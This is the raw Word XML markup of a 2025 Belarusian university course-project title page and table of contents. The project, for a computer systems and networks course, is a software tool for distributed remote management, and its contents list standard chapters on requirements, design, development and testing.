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EB4" w14:textId="77777777" w:rsidR="00F50BC9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  <w:bookmarkStart w:id="0" w:name="_Hlk199192738"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Министерство образования Республики Беларусь</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747B9044" w14:textId="77777777" w:rsidR="00F50BC9" w:rsidRPr="009A2706" w:rsidRDefault="00F50BC9" w:rsidP="000B75DC"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435A6ABA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7EBD3C4E" w14:textId="77777777" w:rsidR="00F50BC9" w:rsidRPr="009A2706" w:rsidRDefault="00F50BC9" w:rsidP="000B75DC">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="39" w:hanging="62"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CBF7B4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8E8AE28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316DEED4" w14:textId="77777777" w:rsidR="00F50BC9" w:rsidRPr="009A2706" w:rsidRDefault="00F50BC9" w:rsidP="000B75DC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616FFAA1" w14:textId="77777777" w:rsidR="00F50BC9" w:rsidRPr="00D066B0" w:rsidRDefault="00F50BC9" w:rsidP="000B75DC">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="39" w:hanging="62"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FEED47F" w14:textId="3F5A42F1" w:rsidR="00F50BC9" w:rsidRDefault="00B22EB0" w:rsidP="000B75DC"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>Дисциплина:</w:t>
      </w:r>
      <w:r w:rsidR="00F50BC9">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA6BA0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Компьютерные системы и сети</w:t>
      </w:r>
      <w:r w:rsidR="00AF4358">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00AA6BA0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>КСИС</w:t>
      </w:r>
      <w:r w:rsidR="00AF4358">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285AD618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3FD414E9" w14:textId="77777777" w:rsidR="001C17C4" w:rsidRPr="00E259FD" w:rsidRDefault="001C17C4" w:rsidP="000B75DC">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="40"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4632FF58" w14:textId="77777777" w:rsidR="001C17C4" w:rsidRPr="00E259FD" w:rsidRDefault="00B60DC7" w:rsidP="000B75DC"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 w14:paraId="2D7A9E7F" w14:textId="77777777" w:rsidR="001C17C4" w:rsidRDefault="001C17C4" w:rsidP="000B75DC">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="541F4B92" w14:textId="77777777" w:rsidR="000B75DC" w:rsidRDefault="000B75DC" w:rsidP="000B75DC">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FA30D49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D417CEA" w14:textId="77777777" w:rsidR="001C17C4" w:rsidRDefault="006D0BF9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</w:t>
      </w:r>
      <w:r w:rsidR="00E259FD">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>проекту</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1461FD38" w14:textId="77777777" w:rsidR="001C17C4" w:rsidRDefault="001C17C4" w:rsidP="000B75DC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0E3C0984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3045BAF6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7E223712" w14:textId="77777777" w:rsidR="00C90012" w:rsidRPr="009429E8" w:rsidRDefault="00815A01" w:rsidP="00C90012">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815A01">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00C90012" w:rsidRPr="00C90012">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ПРОГРА</w:t>
      </w:r>
      <w:r w:rsidR="00C90012">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ММНОЕ СРЕДСТВО</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A7A73A" w14:textId="5B8B6CB5" w:rsidR="001C17C4" w:rsidRPr="00815A01" w:rsidRDefault="00AA6BA0" w:rsidP="00C90012">
      <w:pPr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ПР</w:t>
      </w:r>
      <w:r w:rsidR="002D451F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Е</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ДЕЛЁННОГО УДАЛЁННОГО УПРАВЛЕНИЯ</w:t>
      </w:r>
      <w:r w:rsidR="00241B56">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C70EF3" w14:textId="77777777" w:rsidR="001C17C4" w:rsidRDefault="001C17C4" w:rsidP="000B75DC">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A954091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5ADADA2C" w14:textId="34574022" w:rsidR="001C17C4" w:rsidRDefault="00B22EB0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КП </w:t>
      </w:r>
      <w:r w:rsidR="00B33A3F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1-40 01 01</w:t>
      </w:r>
      <w:r w:rsidR="00A8761B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="002A2B96" w:rsidRPr="00662610">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00C55850">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r w:rsidR="00B33A3F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001C17C4">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>ПЗ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F0A3E7" w14:textId="77777777" w:rsidR="001C17C4" w:rsidRDefault="001C17C4" w:rsidP="000B75DC">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62CC8731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5B6B5E6E" w14:textId="77777777" w:rsidR="009D7CC9" w:rsidRPr="009A2706" w:rsidRDefault="009D7CC9" w:rsidP="000B75DC">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="411296ED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0134CA55" w14:textId="77777777" w:rsidR="000B75DC" w:rsidRDefault="000B75DC" w:rsidP="000B75DC">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6142D640" w14:textId="77777777" w:rsidR="009D7CC9" w:rsidRDefault="009D7CC9" w:rsidP="000B75DC">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C223801" w14:textId="730414A8" w:rsidR="009D7CC9" w:rsidRDefault="006D0BF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Студент: </w:t>
      </w:r>
      <w:r w:rsidR="009D7CC9">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">гр. </w:t>
      </w:r>
      <w:r w:rsidR="00AA6BA0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>351002</w:t>
      </w:r>
      <w:r w:rsidR="009D7CC9">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA6BA0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Яхновец</w:t>
      </w:r>
      <w:r w:rsidR="009D7CC9" w:rsidRPr="0011068B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA6BA0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidR="0011068B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AA6BA0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>А</w:t>
      </w:r>
      <w:r w:rsidR="0011068B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CB731A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430B8622" w14:textId="77777777" w:rsidR="009D7CC9" w:rsidRDefault="009D7CC9" w:rsidP="000B75DC">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="40"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C25B074" w14:textId="32992921" w:rsidR="006D0BF9" w:rsidRDefault="009D7CC9" w:rsidP="000B75DC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643FF8" w:rsidRPr="00643FF8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>асс</w:t>
      </w:r>
      <w:r w:rsidR="00643FF8" w:rsidRPr="00643FF8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00643FF8" w:rsidRPr="00643FF8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AA6BA0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Шамына А.Ю.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E2429F" w14:textId="77777777" w:rsidR="009D7CC9" w:rsidRDefault="009D7CC9" w:rsidP="000B75DC">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="4500"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3822A08F" w14:textId="77777777" w:rsidR="009D7CC9" w:rsidRDefault="009D7CC9" w:rsidP="000B75DC">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23765CC7" w14:textId="77777777" w:rsidR="009D7CC9" w:rsidRDefault="009D7CC9" w:rsidP="000B75DC">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ED1F512" w14:textId="77777777" w:rsidR="000B75DC" w:rsidRDefault="000B75DC" w:rsidP="000B75DC">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B35E8D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273F04BE" w14:textId="77777777" w:rsidR="009D7CC9" w:rsidRDefault="009D7CC9" w:rsidP="000B75DC">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A5A55F" w14:textId="74336AC5" w:rsidR="009D7CC9" w:rsidRPr="005C596E" w:rsidRDefault="00C90012" w:rsidP="000B75DC">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Минск 20</w:t>
      </w:r>
      <w:r w:rsidR="00AA6BA0">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C5F7C3" w14:textId="77777777" w:rsidR="001E6BF1" w:rsidRPr="00124B08" w:rsidRDefault="004D4597" w:rsidP="000B75DC">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="78" w:right="-108" w:hangingChars="28" w:hanging="78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0DBEF445" w14:textId="77777777" w:rsidR="00BA5323" w:rsidRDefault="00BA532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71ADBB47" w14:textId="77777777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>Введение</w:t>
      </w:r>
      <w:r w:rsidR="00225A19" w:rsidRPr="002F7334">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00016787" w:rsidRPr="002F7334">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="009F3EA1" w:rsidRPr="002F7334">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F7334" w:rsidRPr="002F7334">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00EE000C" w:rsidRPr="002F7334">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F6862F" w14:textId="77777777" w:rsidR="0051618F" w:rsidRPr="002F7334" w:rsidRDefault="0051618F" w:rsidP="00133F22">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="dot" w:pos="9072"/>
          <w:tab w:val="center" w:leader="dot" w:pos="9923"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051618F">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Анализ прототипов, литературных источников и формирование требований к проектируемому программному средству</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7334">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="002A0747">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">  4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C86886B" w14:textId="77777777" w:rsidR="0051618F" w:rsidRDefault="0051618F" w:rsidP="00133F22">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="dot" w:pos="9072"/>
          <w:tab w:val="center" w:leader="dot" w:pos="9923"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0051618F">
        <w:t xml:space="preserve">Анализ литературных источников, существующих решений и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502C7EC9" w14:textId="77777777" w:rsidR="00BA5323" w:rsidRPr="002F7334" w:rsidRDefault="0051618F" w:rsidP="0051618F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:tabs>
          <w:tab w:val="center" w:leader="dot" w:pos="9072"/>
          <w:tab w:val="center" w:leader="dot" w:pos="9923"/>
        </w:tabs>
        <w:ind w:left="420" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0051618F">
        <w:t>необходимости разработки</w:t>
      </w:r>
      <w:r w:rsidR="00225A19" w:rsidRPr="002F7334">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00016787" w:rsidRPr="002F7334">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="009F3EA1" w:rsidRPr="002F7334">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001421A4" w:rsidRPr="002F7334">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F7334" w:rsidRPr="002F7334">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00844801" w:rsidRPr="002F7334">
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5608C00E" w14:textId="77777777" w:rsidR="00A1088E" w:rsidRPr="002F7334" w:rsidRDefault="00A1088E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</w:pPr>
      <w:r w:rsidRPr="002F7334">
        <w:rPr>
          <w:rStyle w:val="FontStyle11"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="002F7334">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Формирование</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7334">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F7334">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>требований к проектируемому программному</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BCCD87" w14:textId="77777777" w:rsidR="00A1088E" w:rsidRPr="002F7334" w:rsidRDefault="00BA5323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rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidR="00A1088E" w:rsidRPr="002F7334">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>средству</w:t>
      </w:r>
      <w:r w:rsidR="00A1088E" w:rsidRPr="002F7334">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009F3EA1" w:rsidRPr="002F7334">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A1088E" w:rsidRPr="002F7334">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E6EF6" w:rsidRPr="002F7334">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A0DA7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">  5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2571DB" w14:textId="77777777" w:rsidR="00FE2F97" w:rsidRPr="002F7334" w:rsidRDefault="005558D9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2 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Анализ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к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программном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средству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и </w:t>
      </w:r>
      <w:r w:rsidR="00FE2F97" w:rsidRPr="002F7334">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Bold" w:hAnsi="TimesNewRomanPSMT-Bold" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>разработка</w:t>
      </w:r>
      <w:r w:rsidR="00FE2F97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</w:p>
    <w:p w14:paraId="2D8DD925" w14:textId="77777777" w:rsidR="00BA5323" w:rsidRDefault="00FE2F97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BA5323" w:rsidRPr="002F7334">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Bold" w:hAnsi="TimesNewRomanPSMT-Bold"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    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функциональных</w:t>
      </w:r>
      <w:r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Pr="002F7334">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Bold" w:hAnsi="TimesNewRomanPSMT-Bold" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>требований</w:t>
      </w:r>
      <w:r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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D01A36" w14:textId="77777777" w:rsidR="001E6BF1" w:rsidRPr="002F7334" w:rsidRDefault="001E6BF1" w:rsidP="000B75DC">
      <w:pPr>
        <w:pStyle w:val="ab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 w:rsidRPr="002F7334">
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidR="00BA5323" w:rsidRPr="002F7334">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00487F6E" w:rsidRPr="00487F6E">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Bold" w:hAnsi="TimesNewRomanPSMT-Bold"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Проектирование программного средства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ab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E6EF6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6F3E99" w:rsidRPr="002F7334">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Bold" w:hAnsi="TimesNewRomanPSMT-Bold"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A0DA7">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Bold" w:hAnsi="TimesNewRomanPSMT-Bold"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="001A0DA7">
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3CD71D" w14:textId="3F2F534E" w:rsidR="001E6BF1" w:rsidRPr="002F7334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2F7334">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r w:rsidR="00BA5323" w:rsidRPr="002F7334">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="002D451F" w:rsidRPr="002D451F">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Разработка</w:t>
      </w:r>
      <w:r w:rsidR="0023117C" w:rsidRPr="0023117C">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> программного средства</w:t>
      </w:r>
      <w:r w:rsidR="00742A0B" w:rsidRPr="002F7334">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E6EF6" w:rsidRPr="002F7334">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B162A5" w:rsidRPr="002F7334">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A0DA7">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22155C10" w14:textId="77777777" w:rsidR="002323A4" w:rsidRDefault="001E6BF1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pacing w:val="-6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F7334">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r w:rsidR="00BA5323" w:rsidRPr="002F7334">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="002323A4" w:rsidRPr="002323A4">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Тестирование, проверка работоспособности и анализ полученных </w:t>
      </w:r>
      <w:r w:rsidR="002323A4">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28799447" w14:textId="77777777" w:rsidR="001E6BF1" w:rsidRPr="002F7334" w:rsidRDefault="002323A4" w:rsidP="002323A4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pacing w:val="-6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="002323A4">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>результатов</w:t>
      </w:r>
      <w:r w:rsidR="00742A0B" w:rsidRPr="002F7334">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="007E6EF6" w:rsidRPr="002F7334">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00742A0B" w:rsidRPr="002F7334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>19</w:t>
      </w:r>
    </w:p>
